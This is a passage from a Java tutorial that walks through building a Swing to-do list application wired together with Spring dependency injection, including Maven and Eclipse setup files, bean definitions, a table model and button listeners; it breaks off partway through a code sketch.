- Create the project.xml (see Listing 2) and maven.xml (see Listing 3) Maven configuration files in the todo directory's root.
Listing 2. project.xml
<?xml version="1.0" encoding="UTF-8"?>
<project>
    <pomVersion>3</pomVersion>
    <id>todo</id>
    <name>To Do List</name>
    <currentVersion>1.0</currentVersion>
    <organization>
        <name>To Do List Inc.</name>
        <url></url>
        <logo></logo>
    </organization>
    <inceptionYear>2005</inceptionYear>
    <package>todo</package>
    <logo></logo>
    <description>A To Do List</description>
    <shortDescription>A To Do List</shortDescription>
    <url/>
    <issueTrackingUrl/>
    <siteAddress/>
    <siteDirectory/>
    <distributionDirectory>/notavailable/</distributionDirectory>
    <repository>
        <connection/>
        <url/>
    </repository>
    <mailingLists/>
    <developers/>
    <dependencies>
        <dependency>
            <groupId>springframework</groupId>
            <artifactId>spring</artifactId>
            <version>1.2.3</version>
        </dependency>
        <dependency>
            <groupId>commons-logging</groupId>
            <artifactId>commons-logging</artifactId>
            <version>1.0.3</version>
        </dependency>
    </dependencies>
    <build>
        <nagEmailAddress/>
        <sourceDirectory>src</sourceDirectory>
        <unitTestSourceDirectory/>
        <unitTest/>
        <resources>
            <resource>
                <directory>src</directory>
                <includes>
                    <include>**/*.xml</include>
                </includes>
            </resource>
        </resources>
    </build>
</project>
Listing 3. maven.xml
<project default="test" xmlns:ant="jelly:ant">

    <goal name="run">

        <!-- Assemble a run-time classpath: the compiled classes plus the
             project's dependency JARs. -->
        <ant:path id="run.classpath">
            <ant:pathelement location="${maven.build.dest}"/>
            <ant:path refid="maven.dependency.classpath"/>
        </ant:path>

        <attainGoal name="java:compile"/>
        <attainGoal name="java:jar-resources"/>

        <!-- Launch the application's main class. -->
        <ant:java classname="todo.ToDo" fork="true">
            <ant:classpath refid="run.classpath"/>
        </ant:java>

    </goal>

</project>
Automatically downloading dependencies via Maven
Now, type maven at the command line in the root of the todo directory. The output you see should look something like this:
 __  __
|  \/  |__ _Apache__ ___
| |\/| / _` \ V / -_) ' \  ~ intelligent projects ~
|_|  |_\__,_|\_/\___|_||_|  v. 1.0.2

Attempting to download spring-1.2.3.jar.
1787K downloaded
Attempting to download commons-logging-1.0.3.jar.
30K downloaded

build:start:

java:prepare-filesystem:

java:compile:
    [echo] Compiling to D:\projects\todo/target/classes
    [echo] No java source files to compile.

java:jar-resources:

test:prepare-filesystem:

test:test-resources:

test:compile:
    [echo] No test source files to compile.

test:test:
    [echo] No tests to run.

BUILD SUCCESSFUL
Total time: 35 seconds
Don't worry about the "No tests to run" messages. You are looking for the dependencies to download successfully. Also, be aware that they will download only once, so you won't get the download message on subsequent Maven runs.
You will be instructed to use specific goals in Maven later in the tutorial. The main ones are clean and java:compile, which are standard in Maven, and run, which is a custom goal defined in maven.xml.
Set up Eclipse
This section applies if you've chosen Eclipse as the build environment for the sample application. You'll use Eclipse to create a project, create new files, change perspectives and views, configure your build path, and so on. If you are completely new to Eclipse, I suggest you visit the Eclipse.org main page first to learn the basics of getting around and building projects in Eclipse (see Resources).
First, go to the Java perspective and create a new Java project in your Eclipse workspace named todo. If you already have the todo directory in your workspace (perhaps if you already set up the project for Ant or Maven), you can use the same directory, even though you might get a warning that the location already exists.
After the project is created, you can open the Navigator view (you can't see .* project files in the Package Explorer view) and then create/edit/replace the relevant Eclipse configuration files, shown in Listings 4 through 7. All paths are relative to the todo project root. Usually you wouldn't directly create or edit these files (you would use the menu options in Eclipse), but they are included here for completeness and to reference if you have problems with your Eclipse project setup.
You can overwrite the .project file, shown in Listing 4, or you can use the one that was generated when you created the project:
Listing 4. .project
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
    <name>todo</name>
    <comment></comment>
    <projects>
    </projects>
    <buildSpec>
        <buildCommand>
            <name>org.eclipse.jdt.core.javabuilder</name>
            <arguments>
            </arguments>
        </buildCommand>
    </buildSpec>
    <natures>
        <nature>org.eclipse.jdt.core.javanature</nature>
    </natures>
</projectDescription>
The .cvsignore file, shown in Listing 5, is optional, but you'll want to use it if you check your project into a CVS repository:
Listing 5. .cvsignore
target
build
lib
eclipseclasses
Use the version of .classpath in Listing 6 if you want to download your dependencies via Ant or if you have downloaded them yourself and placed them in the lib subdirectory:
Listing 6. .classpath pointing to Ant-downloaded dependencies in lib
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
    <classpathentry kind="src" path="src"/>
    <classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER"/>
    <classpathentry kind="lib" path="lib/commons-logging-1.0.3.jar"/>
    <classpathentry kind="lib" path="lib/spring-1.2.3.jar"/>
    <classpathentry kind="output" path="eclipseclasses"/>
</classpath>
Use the version of .classpath in Listing 7 if you want to download your dependencies via Maven:
Listing 7. .classpath pointing to Maven-downloaded dependencies in MAVEN_REPO
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
    <classpathentry kind="src" path="src"/>
    <classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER"/>
    <classpathentry kind="var"
        path="MAVEN_REPO/commons-logging/jars/commons-logging-1.0.3.jar"/>
    <classpathentry kind="var"
        path="MAVEN_REPO/springframework/jars/spring-1.2.3.jar"/>
    <classpathentry kind="output" path="eclipseclasses"/>
</classpath>
Downloading and defining dependency JARs in the Eclipse classpath
You must download the proper dependency JARs in order to run the sample application under Eclipse. To make this easier, both the Ant and Maven builds described in this section provide a way to download the JARs automatically to a specified location (see Automatically downloading dependencies via Ant and Automatically downloading dependencies via Maven).
To auto-download the dependencies using Ant:
- Have Ant installed.
- Create build.xml (see Listing 1).
- Type ant get-dependencies from the root of the project.
If you wish to use Maven to auto-download the dependencies:
- Have Maven installed.
- Create project.xml (see Listing 2).
- Type maven from the root of the project. (The required JARs download automatically on the first run.)
If you use the Maven approach, you also need to define an Eclipse classpath variable named MAVEN_REPO to specify the location of your Maven repository, as shown in Figure 1. (By default, it is in your user home directory.)
Figure 1. Setting an Eclipse classpath variable pointing to MAVEN_REPO
Finally, if you don't want to use Ant or Maven, or the auto-download is not working for some reason, you can manually download the required dependencies and place them in the lib folder. In this case, you would use the .classpath example in Listing 6, which references the JARs in the lib folder.
Also, remember to switch back to the Package Explorer view if you are still on the Navigator view. Working with Java code is easier in the Package Explorer view.
Creating the to-do list: Basic Swing and Spring application setup
In this section, you'll create the basic runnable skeleton of the to-do list application, including Swing and Spring files that you'll build on later in the tutorial. You'll perform a simple example of dependency injection. At the end of the section, you'll have a running application.
Creating the MainFrame, Launcher, and ToDo classes
To start the foundation for the Swing application, you need three parts:
- A class that subclasses the Swing JFrame class. All Swing applications must have a main outer frame to contain all other components. You'll call this class MainFrame.
- A Launcher class, responsible for initializing and configuring the Spring framework.
- A class with a main method, used to launch the application. You'll name this class ToDo.
You could have combined these three separate classes into one or two classes or inner classes, but it's simpler to keep them separate. Separating them has additional advantages in more-complex applications. For example, during testing, you might want to have a specialized Launcher class that you can configure and invoke directly from your tests -- perhaps to avoid starting asynchronous tasks that would interfere with testing but are needed during normal application startup.
Listings 8, 9, and 10 show the code for the MainFrame, Launcher, and ToDo classes, respectively. Create a src directory in the project's root. Then create MainFrame.java, Launcher.java, and ToDo.java in the appropriate package structure. (This means that the directory structure under src must match the package name of the class.) Note that MainFrame.java is in the todo.ui subpackage, where you'll keep the classes related to the user interface.
Listing 8. src/todo/ui/MainFrame.java
package todo.ui;

import java.awt.Dimension;
import java.awt.Frame;

import javax.swing.JFrame;
import javax.swing.WindowConstants;

public class MainFrame extends JFrame {

    public void init() {
        setDefaultCloseOperation(WindowConstants.DISPOSE_ON_CLOSE);
        setSize(new Dimension(600, 400));
        setVisible(true);
        setState(Frame.NORMAL);
        show();
    }
}
The MainFrame class is a pretty straightforward implementation of a Swing JFrame. The code to configure and show the frame is defined in a public void init() method. This method will be the first method in the application invoked by Spring and the entry point to the Swing application. You'll see how to invoke it in the next panel, Creating the Spring app-context.xml bean definition file.
Listing 9. src/todo/Launcher.java
package todo;

import org.springframework.context.support.ClassPathXmlApplicationContext;

public class Launcher {

    public void launch() {
        String[] contextPaths = new String[] {"todo/app-context.xml"};
        new ClassPathXmlApplicationContext(contextPaths);
    }
}
The purpose of the Launcher class is to initialize and launch the Spring framework by creating an ApplicationContext and passing it an array containing the paths to the bean definition file(s) that you'll create in Creating the Spring app-context.xml bean definition file. Spring creates the MainFrame class automatically when the framework starts up, because the bean will be defined as a Singleton (see Resources). There are several other types of ApplicationContext implementations besides ClassPathXmlApplicationContext, but they all serve as a way to provide configuration for a Spring application.
Listing 10. src/todo/ToDo.java
package todo;

public class ToDo {

    public static void main(String[] args) {
        Launcher launcher = new Launcher();
        launcher.launch();
    }
}
The ToDo class in Listing 10 simply has a main method that creates a Launcher and calls launch() on it.
After you type these classes in, make sure they compile by using the appropriate method for your build environment:
- Ant: Change to the root directory of the project that contains build.xml. Type ant compile at the command line, or invoke the compile target from your IDE.
- Maven: Change to the root directory of the project that contains maven.xml. Type maven java:compile at the command line.
- Eclipse: Choose Build Project, or ensure you have Build Automatically turned on.
You should get a BUILD SUCCESSFUL message at the command line or no errors for the project in the Eclipse Problems view. If you have any problems, read the compiler error messages carefully. Specifically, make sure you have the required dependency JARs on your classpath. If you don't have them, go back to Environment setup and read how to download the required dependencies automatically.
Note: From this point forward, you will be expected to compile all new files and changes immediately after you make them and to fix any problems that occur. For the sake of brevity, you won't always be explicitly instructed to compile.
Creating the Spring app-context.xml bean definition file
The heart of a Spring project is the bean definition file (or files). This is an XML file that can have any name. You'll call yours app-context.xml and create it in the todo package, where it will be on the classpath (see Listing 11).
Listing 11. src/todo/app-context.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN"
    "http://www.springframework.org/dtd/spring-beans.dtd">

<beans>
    <bean id="mainFrame" class="todo.ui.MainFrame" init-method="init">
    </bean>
</beans>
The root element of the bean definition file is <beans>, which contains <bean> elements. The <bean> element provides several attributes, but for your first bean definition you'll use just three: id, class, and init-method. The id attribute defines the bean's name, which is used to retrieve it from Spring. The class attribute tells Spring which class to instantiate when it creates the bean. The init-method attribute defines a method name on the class that will be automatically invoked after Spring instantiates it.
It is important to know that all beans are Singletons by default, unless you specify the singleton="false" attribute on the bean element. Spring automatically instantiates all Singletons when it is first initialized, unless the lazy-init="true" attribute is specified.
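For illustration, here is how those two attributes would look in a bean definition. (The bean names and the SomeExpensiveHelper class are hypothetical examples, not part of the to-do application; the attribute syntax is the Spring 1.x DTD style used throughout this tutorial.)

```xml
<!-- Not a Singleton: a new instance is created every time this bean is requested. -->
<bean id="scratchList" class="java.util.ArrayList" singleton="false"/>

<!-- Still a Singleton, but not instantiated until it is first requested.
     SomeExpensiveHelper is a hypothetical class used only for this example. -->
<bean id="expensiveHelper" class="todo.SomeExpensiveHelper" lazy-init="true"/>
```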
This autocreation of Singletons is the reason why the Launcher class needs to create only the ApplicationContext and isn't required to do anything else. Spring simply creates MainFrame as a Singleton and calls the init() method on it, which causes it to show itself. Can't wait to try it out? Move on to the next panel, Running the application, for instructions on running your new Spring application.
Running the application
To see your application, follow the instructions for your build environment:
- Ant: Change to the root directory of the project that contains build.xml. Type ant run or invoke the run target from your IDE.
- Maven: Change to the root directory of the project that contains maven.xml. Type maven run.
- Eclipse: Run the ToDo class as a Java Application (right-click on ToDo.java and select Run As > Java Application).
When you run the application, you should see a blank, gray frame with no title, as shown in Figure 2. If you do, congratulations -- you just ran your first application under Spring!
Figure 2. A blank screen shown by a Swing JFrame, created by Spring
If it doesn't run, look for any exception messages on the console. Spring usually provides straightforward and descriptive error messages and exceptions, so read them carefully. Even if the application runs successfully, you might see some INFO messages printed to the console, such as "INFO: Unable to locate MessageSource with name 'messageSource': using default...." Don't worry; these are normal.
Note: From this point forward, the instruction "run the application" means that you should run the appropriate command for your build environment.
Defining bean properties
Now that you have a basic bean being run by Spring, you can try defining some properties for the bean in app-context.xml. You'll start by defining a title for the bean. The setTitle(String title) accessor method for the frame title is defined on the Frame superclass of your MainFrame class, so you can use it. Add the new code in Listing 12 to your definition of the mainFrame bean in app-context.xml. Remember, you already created the src/todo/app-context.xml file, so you only need to add the new lines. From now on, if a code listing is for an existing file, the new (boldfaced) lines will be surrounded by existing lines so you know where to put them.
Listing 12. Defining the bean's title property
<bean id="mainFrame" class="todo.ui.MainFrame" init-method="init">
    <property name="title">
        <value>My To Do List</value>
    </property>
</bean>
Run the application, and you should see My To Do List as the title of the frame, as in Figure 3:
Figure 3. Injecting the title text into the JFrame
This was your first simple use of dependency injection. You "injected" a plain String object into the title property of your MainFrame class. Under the covers, Spring is automatically creating a String with the value My To Do List and passing that as a parameter to the setTitle() method of the todo.ui.MainFrame class. This is an important concept, because all other types of dependency injection in Spring are basically the same. You use the bean definition file(s) to define values, objects, or collections of objects that will be passed (injected) as properties into other objects. Then, Spring wires them together at run time by handling the object creation and property setting for you.
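To demystify "under the covers" a little, here is a rough, simplified sketch of setter injection done with plain reflection. The TitledBean class is a hypothetical stand-in for MainFrame (instantiating a real JFrame requires a display), and Spring's actual implementation is far more sophisticated, but the core mechanism is the same: derive the setter name from the property name, look it up reflectively, and invoke it with the configured value.

```java
import java.lang.reflect.Method;

// Hypothetical stand-in for MainFrame; only the wiring mechanism matters here.
class TitledBean {
    private String title;
    public void setTitle(String title) { this.title = title; }
    public String getTitle() { return title; }
}

class SetterInjectionSketch {

    // Roughly what the container does for <property name="title">:
    // "title" becomes "setTitle", which is found reflectively and invoked.
    static void inject(Object bean, String property, Object value) {
        try {
            String setterName = "set"
                    + Character.toUpperCase(property.charAt(0))
                    + property.substring(1);
            Method setter = bean.getClass().getMethod(setterName, value.getClass());
            setter.invoke(bean, value);
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        TitledBean bean = new TitledBean();
        inject(bean, "title", "My To Do List");
        System.out.println(bean.getTitle()); // My To Do List
    }
}
```

The sketch also hints at why setter injection needs only a no-argument constructor plus accessor methods: the container never has to know the concrete type at compile time.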
Having the framework do the work of wiring things together is powerful. If you need to change the way that things are wired together in the future, you might only need to change the Spring configuration files and not need to touch your thoroughly tested and bug-free code. Of course, integration problems can always occur when you rewire existing components together in different ways. However, if your components are designed according to good object-oriented principles such as loose coupling and high cohesion (more on this in the next section, Creating the to-do list: Making a reusable component and showing data in a table), you might find that these types of integration problems are relatively rare.
Creating the to-do list: Making a reusable component and showing data in a table
In this section, you'll start fleshing out the application. You won't see any data in your list until the end of the section, but please be patient; you first must create some layout plumbing so you'll have a place to put your data. It will be worth the wait. Also, this section takes some extra time to create a reusable component, show how it can be reused by Spring without changing it, and discuss the benefits of creating reusable components.
Creating a reusable panel
Now, you'll add a panel to the MainFrame. I'm going to cheat a little bit here and predict the future. I know you'll be reusing this panel, so you'll make it generic enough to be reused. Doing so will let you see later in this section (in Adding a table and reusing the panel) how easy it is to reuse existing classes in Spring, as long as they are designed with reuse in mind. Usually you'd code a more customized and simple class initially, and then make it more generic for reuse later. (Even then, you'd do so only when you are sure you need to reuse it. See "You Aren't Going To Need It" in Resources.) However, for the purposes of this tutorial, you'll make it reusable from the start to keep things simple and save time.
Make a class called BoxLayoutPanel in the todo.ui package. BoxLayoutPanel is a subclass of JPanel and has a BoxLayout (see Listing 13):
Listing 13. src/todo/ui/BoxLayoutPanel.java
package todo.ui;

import java.awt.Component;
import java.util.Iterator;
import java.util.List;
import javax.swing.BoxLayout;
import javax.swing.JPanel;

public class BoxLayoutPanel extends JPanel {

    /**
     * We can't use "components" as the property name,
     * because it conflicts with an existing property
     * on the Component superclass.
     */
    private List panelComponents;
    private int axis;

    public void setAxis(int axis) {
        this.axis = axis;
    }

    public void setPanelComponents(List panelComponents) {
        this.panelComponents = panelComponents;
    }

    public void init() {
        setLayout(new BoxLayout(this, axis));
        for (Iterator iter = panelComponents.iterator(); iter.hasNext();) {
            Component component = (Component) iter.next();
            add(component);
        }
    }
}
As you can see in Listing 13, the axis (X/Y) property of the BoxLayout is settable with a setAxis() method. The panel has a List of Components, which will be automatically added to the panel when it is initialized. The code to set up the BoxLayout and add the components to the panel is in an init() method that Spring calls when the bean is created, just like the MainFrame bean.
Wiring beans together
Now, you need to wire the panel into Spring and provide a component to add to it, so you'll modify app-context.xml as in Listing 14 (by adding the boldfaced elements):
Listing 14. src/todo/app-context.xml - Wiring the BoxLayoutPanel into Spring
<bean id="mainFrame" class="todo.ui.MainFrame" init-method="init">
    <property name="contentPane">
        <ref bean="mainPanel"/>
    </property>
    <property name="title">
        <value>My To Do List</value>
    </property>
</bean>

<bean id="mainPanel" class="todo.ui.BoxLayoutPanel" init-method="init">
    <property name="axis">
        <!-- "1" corresponds to BoxLayout.Y_AXIS -->
        <value>1</value>
    </property>
    <property name="panelComponents">
        <list>
            <ref bean="itemScrollPane"/>
        </list>
    </property>
</bean>

<bean id="itemScrollPane" class="javax.swing.JScrollPane">
</bean>
There are a few things to notice in Listing 14. First, you create the mainPanel bean much like the mainFrame bean. Then, you inject it into the mainFrame bean, by using the contentPane property and <ref bean="mainPanel"/>. setContentPane() is a method to add a panel to a frame. It is available to you automatically, because MainFrame subclasses JFrame and therefore inherits the setContentPane() method. <ref bean="mainPanel"/> simply takes the mainPanel object that Spring creates and passes it to the setContentPane() method on MainFrame.
You also inject values into the axis and panelComponents properties of BoxLayoutPanel. For axis, the 1 corresponds to the Y_AXIS constant of BoxLayout. (Note that Spring does provide a way to set a bean property from a static field value, by using a FieldRetrievingFactoryBean. But I don't want to get too fancy, so you'll just hard-code the value of the axis constants.)
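Because the values are hard-coded in the XML, it's worth confirming that they match the actual BoxLayout constants. This tiny check is not part of the application; it just prints the constant values that app-context.xml relies on:

```java
import javax.swing.BoxLayout;

class AxisConstantsCheck {
    public static void main(String[] args) {
        // app-context.xml hard-codes 0 and 1, so they must match these constants.
        System.out.println("X_AXIS = " + BoxLayout.X_AXIS); // X_AXIS = 0
        System.out.println("Y_AXIS = " + BoxLayout.Y_AXIS); // Y_AXIS = 1
    }
}
```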
The panelComponents property takes a List, so you use the <list> element to make Spring automatically create an ArrayList for you. Spring can automatically create the following collection types: List, Set, Map, and Properties.
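For reference, the four collection elements look like this in a bean definition. (The property names here are hypothetical examples, not part of the to-do application; the element syntax is standard Spring 1.x configuration.)

```xml
<property name="someList">
    <list>
        <value>one</value>
        <value>two</value>
    </list>
</property>
<property name="someSet">
    <set>
        <value>unique</value>
    </set>
</property>
<property name="someMap">
    <map>
        <entry key="color"><value>blue</value></entry>
    </map>
</property>
<property name="someProperties">
    <props>
        <prop key="timeout">30</prop>
    </props>
</property>
```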
Finally, you defined a third bean, itemScrollPane, which is a JScrollPane, so that you have a Component in your List. itemScrollPane doesn't require any custom code, so you don't even need to subclass JScrollPane; you just let Spring instantiate it directly. See how you can use Spring to wire together instances of preexisting classes that know nothing about Spring, using their existing methods?
Run the application, and you should see ... pretty much the same thing you saw before. Even though you added a Panel and a ScrollPane, Swing doesn't show scrollbars unless there is something to scroll. You'll add a component to the ScrollPane in the next section. Bear with me -- this will be a fully functional application, once you get through some of these inevitable boring bits.
Adding a table and reusing the panel
Next, you'll add a JTable named itemTable to the existing itemScrollPane. You'll also place another BoxLayoutPanel, named buttonPanel, in the existing mainPanel. This gives you a panel to hold the buttons. This time, you aren't writing any new Java code; you are just defining and wiring together more beans in app-context.xml, using existing classes (see Listing 15):
Listing 15. src/todo/app-context.xml - Reusing BoxLayoutPanel
<bean id="mainPanel" class="todo.ui.BoxLayoutPanel" init-method="init">
    <property name="axis">
        <!-- "1" corresponds to BoxLayout.Y_AXIS -->
        <value>1</value>
    </property>
    <property name="panelComponents">
        <list>
            <ref bean="itemScrollPane"/>
            <ref bean="buttonPanel"/>
        </list>
    </property>
</bean>

<bean id="itemScrollPane" class="javax.swing.JScrollPane">
    <constructor-arg>
        <ref bean="itemTable"/>
    </constructor-arg>
</bean>

<bean id="itemTable" class="javax.swing.JTable">
</bean>

<bean id="buttonPanel" class="todo.ui.BoxLayoutPanel" init-method="init">
    <property name="axis">
        <!-- "0" corresponds to BoxLayout.X_AXIS -->
        <value>0</value>
    </property>
    <property name="panelComponents">
        <list>
        </list>
    </property>
</bean>
Remember how you made the BoxLayoutPanel generic so you could reuse it (see Creating a reusable panel)? The buttonPanel is an instance of BoxLayoutPanel just like mainPanel. However, it holds buttons instead of a scroll pane, and it will lay out along the X axis rather than the Y axis -- but this is all configured via Spring, so you don't need to change the code. Reuse without needing to change code is good!
Take a minute to think about how you made the BoxLayoutPanel reusable. First, you were careful of your dependencies. The only requirements of the BoxLayoutPanel interface are the axis value and a List of Components. (Almost every Swing GUI element inherits from Component.) You could have originally created a ScrollPaneAndButtonPanePanel and had specific setScrollPane and setButtonPane setters for each of those components, but that wouldn't have been very reusable at all. Instead, you just took a generic List of Components and iterated over it (facilitated by BoxLayout's linear layout scheme). This means that this pane can be reused to lay out any number of GUI components in a vertical or horizontal line, and it never needs to know what type of components they are. This illustrates the good programming practices of low coupling and high cohesion in action (see Resources). Your BoxLayoutPanel lays out components in a row or column, does it very well, and doesn't do anything else (high cohesion). And, it neither knows nor cares about what it lays out, other than the fact that it is a List of Components (low coupling).
Another interesting addition to app-context.xml in Listing 15 is the use of the <constructor-arg> element. This is constructor injection, as opposed to the setter injection you've been using so far. This sounds kind of complex, but it's really not. You are just passing in (injecting) your dependency through a constructor argument, rather than a setter (accessor) method argument. The only reason you use it here is that JScrollPane lets you add a component only through the constructor; you can't add it through a setter.
Run the application, and you should see -- nothing again. Don't despair -- I promise something more exciting will happen very soon.
To summarize, you now have MainFrame, which contains a BoxLayoutPanel. The BoxLayoutPanel contains a JScrollPane with an empty JTable, and another BoxLayoutPanel for the soon-to-be-added buttons. However, because these are all container-type components that don't contain anything, they all just show up as a big gray box. But now that all that plumbing is out of the way, you can add some goodies to create something much more exciting.
Defining a table model
In the next section (Creating the to-do list: Finishing up with buttons and listeners), you'll display some items in the to-do list. To accomplish this, you first need to create an implementation of TableModel, which you'll set on your JTable. Your TableModel implementation will be called ItemTableModel, and it will simply be a wrapper for a List of items. To make this easier, you'll extend the AbstractTableModel abstract class provided by Swing and override only the methods you need to make your TableModel behave properly when you add it to the JTable. Listing 16 shows the code for ItemTableModel:
Listing 16. src/todo/ui/ItemTableModel.java
package todo.ui;

import java.util.List;
import javax.swing.table.AbstractTableModel;

public class ItemTableModel extends AbstractTableModel {

    List itemList;

    public boolean isCellEditable(int rowIndex, int columnIndex) {
        return true;
    }

    public int getColumnCount() {
        return 1;
    }

    public String getColumnName(int column) {
        return "Items";
    }

    public void setItemList(List itemList) {
        this.itemList = itemList;
    }

    public int getRowCount() {
        return itemList.size();
    }

    public void setValueAt(Object value, int rowIndex, int columnIndex) {
        itemList.set(rowIndex, value);
    }

    public Object getValueAt(int rowIndex, int columnIndex) {
        return itemList.get(rowIndex);
    }
}
The methods in ItemTableModel are fairly straightforward and self-explanatory. Cells are always editable (isCellEditable() always returns true). The table has only one column. The row count is always equal to the list size. The setValueAt() and getValueAt() methods simply access the element in the underlying list at the specified row index. The columnIndex parameter can be ignored because the table has only one column. Finally, there is the itemList property and its setter. That's all there is to the class. Save it and make sure it compiles. No need to run the application yet, because you haven't yet wired the ItemTableModel class into the rest of the application.
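If you want to convince yourself that the model behaves as described before wiring it in, you can exercise it from a plain main method. The class below re-declares the tutorial's ItemTableModel under a different name so the snippet stands alone; no display is needed, because table models are plain objects:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import javax.swing.table.AbstractTableModel;

// The tutorial's ItemTableModel, re-declared so this check is self-contained.
class ItemTableModelCheck extends AbstractTableModel {

    List itemList;

    public boolean isCellEditable(int rowIndex, int columnIndex) { return true; }
    public int getColumnCount() { return 1; }
    public String getColumnName(int column) { return "Items"; }
    public void setItemList(List itemList) { this.itemList = itemList; }
    public int getRowCount() { return itemList.size(); }
    public void setValueAt(Object value, int rowIndex, int columnIndex) {
        itemList.set(rowIndex, value);
    }
    public Object getValueAt(int rowIndex, int columnIndex) {
        return itemList.get(rowIndex);
    }

    public static void main(String[] args) {
        ItemTableModelCheck model = new ItemTableModelCheck();
        model.setItemList(new ArrayList(Arrays.asList(
                new String[] {"Item 1", "Item 2", "Item 3"})));
        System.out.println(model.getRowCount());    // 3
        System.out.println(model.getValueAt(1, 0)); // Item 2
        model.setValueAt("Edited", 1, 0);           // simulates an in-cell edit
        System.out.println(model.getValueAt(1, 0)); // Edited
    }
}
```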
Showing items in the list
You might be wondering where the List of items will come from. That is a very important question, and the very important answer is: you don't care at this point. Right now, the only dependency that your TableModel has on the data is that it implements the List interface. This means that it could come from anywhere -- a database, a network request, or a simple hard-coded ArrayList. (You'll use a simple ArrayList.) It doesn't matter, as long as you put the data into some class that implements the List interface and inject it into your TableModel. This is good for a few reasons:
- You can finish coding and testing your list-display GUI functionality against a simple hard-coded list, and put off until later details such as how you will store the list or retrieve stored lists.
- The "real" implementation of your list could be developed by someone else, in a completely different project, with his or her own Spring configuration file, and you could still wire it together with your GUI later to make a single application. Spring lets you have multiple app-context bean definition files.
- If you do want to add fancy stuff later to your list implementation, such as database persistence (JDBC or ORM) or remote access (Spring supports several different remoting technologies), you can. The Spring framework is filled with lots of helper and wrapper classes for services such as these, as well as examples of how to use them. This can make your development effort much easier (and require much less code) than if you had to use the APIs of the services directly. And the Spring wrappers are designed to be loosely coupled and reusable just like the beans in your to-do list application.
- Even if you eventually do write a real implementation of the list, you can still plug in a stub implementation at any time it is convenient -- for example, during tests, when you don't want to incur the overhead of a database hit, or when you want to have complete and easy control over the list's behavior (see Resources for more on test-driven development).
But enough with the gratuitous gushing. Back to the code. It's time to make the stub list implementation and wire it up with your TableModel and JTable. The define-and-inject pattern for configuring beans in the Spring app-context.xml configuration file should start becoming more familiar by now (see Listing 17):
Listing 17. src/todo/app-context.xml - Adding a stub list implementation
<bean id="itemTable" class="javax.swing.JTable">
    <property name="model">
        <ref bean="itemTableModel"/>
    </property>
</bean>

<bean id="itemTableModel" class="todo.ui.ItemTableModel">
    <property name="itemList">
        <ref bean="itemList"/>
    </property>
</bean>

<bean id="itemList" class="java.util.ArrayList">
    <constructor-arg>
        <list>
            <value>Item 1</value>
            <value>Item 2</value>
            <value>Item 3</value>
        </list>
    </constructor-arg>
</bean>
Now, run the application, and you should see your data in the list, as shown in Figure 4:
Figure 4. A list with data in it
The list is even editable, because you always return true from isCellEditable(). Try it: just click in a cell and type or delete characters. When you get bored with that, move on to the next section, where you'll add buttons for adding and deleting items from the list.
Creating the to-do list: Finishing up with buttons and listeners
You'll finish writing your to-do list application in this section. You'll create buttons and listeners that let you add and delete items from the list. The section also includes some discussion about how your button and listener code is different from most other Swing sample code or tutorials.
Creating buttons and listeners
You're in the home stretch now. All you need to do is create Add New and Delete buttons and hook them up to the list using events and listeners. This is all fairly basic stuff in Swing/Java programming (see Resources for good examples and tutorials on these topics), so I'll cover it pretty quickly -- especially because the Spring wiring code is pretty similar to what you've already seen. The classes you'll create to make the buttons work use Swing's implementation of the Observer pattern. If you don't understand that pattern you might get a bit confused; see Resources for more information on the Observer pattern.
First, create a subclass of JButton called ActionListenerButton, which you'll use for both the Add New and Delete buttons (see Listing 18):
Listing 18. src/todo/ui/button/ActionListenerButton.java
package todo.ui.button;

import java.awt.event.ActionListener;
import javax.swing.JButton;

public class ActionListenerButton extends JButton {

    private ActionListener actionListener;

    public void setActionListener(ActionListener actionListener) {
        this.actionListener = actionListener;
    }

    public void init() {
        this.addActionListener(actionListener);
    }
}
The ActionListenerButton class has a property to hold an ActionListener, and an init() method (called by Spring upon bean creation) that adds the ActionListener to the button. This class plays the role of the subject in the Observer pattern, and it will notify its ActionListener when clicked. Notice that ActionListenerButton is in a new todo.ui.button package.
Next, create an abstract superclass called ListTableActionListener, which contains the common functionality of the ActionListeners for your buttons. This common functionality is the existence of properties for the list and table, which the subclasses will access and modify when their actionPerformed() methods are invoked. The subclasses of ListTableActionListener act as the observers in the Observer pattern. Listing 19 shows the code for ListTableActionListener:
Listing 19. src/todo/ui/button/ListTableActionListener.java
package todo.ui.button;

import java.awt.event.ActionListener;
import java.util.List;
import javax.swing.JTable;

public abstract class ListTableActionListener implements ActionListener {

    protected JTable table;
    protected List list;

    public void setList(List list) {
        this.list = list;
    }

    public void setTable(JTable itemTable) {
        this.table = itemTable;
    }
}
Next, create AddNewButtonActionListener, shown in Listing 20:
Listing 20. src/todo/ui/button/AddNewButtonActionListener
package todo.ui.button;

import java.awt.event.ActionEvent;

public class AddNewButtonActionListener extends ListTableActionListener {

    public void actionPerformed(ActionEvent e) {
        list.add("New Item");
        table.revalidate();
    }
}
AddNewButtonActionListener adds a new default item to the list when actionPerformed() is invoked, and calls table.revalidate() to make the table display the newly inserted data.
Finally, create DeleteButtonActionListener, shown in Listing 21:
Listing 21. src/todo/ui/button/DeleteButtonActionListener
package todo.ui.button;

import java.awt.event.ActionEvent;

public class DeleteButtonActionListener extends ListTableActionListener {

    public void actionPerformed(ActionEvent e) {
        int selectedRow = table.getSelectedRow();
        if (selectedRow == -1) {
            // if there is no selected row, don't do anything
            return;
        }
        if (table.isEditing()) {
            // if we are editing the table, don't do anything
            return;
        }
        list.remove(selectedRow);
        table.revalidate();
    }
}
This ActionListener gets the index of the currently selected row, if there is one, and removes the corresponding item from the list if the row is not currently being edited. After removing the item, the table is revalidated to display the changes.
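The guard conditions are easy to verify in isolation. Here is a small sketch (not part of the application) that mirrors the listener's decision logic against a plain List, with the selected-row index and editing state passed in directly instead of being read from a JTable:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

class DeleteLogicSketch {

    // Mirrors DeleteButtonActionListener.actionPerformed() without Swing:
    // remove the selected row from the backing list, unless nothing is
    // selected or a cell edit is in progress. Returns true if a row was removed.
    static boolean delete(List<String> list, int selectedRow, boolean editing) {
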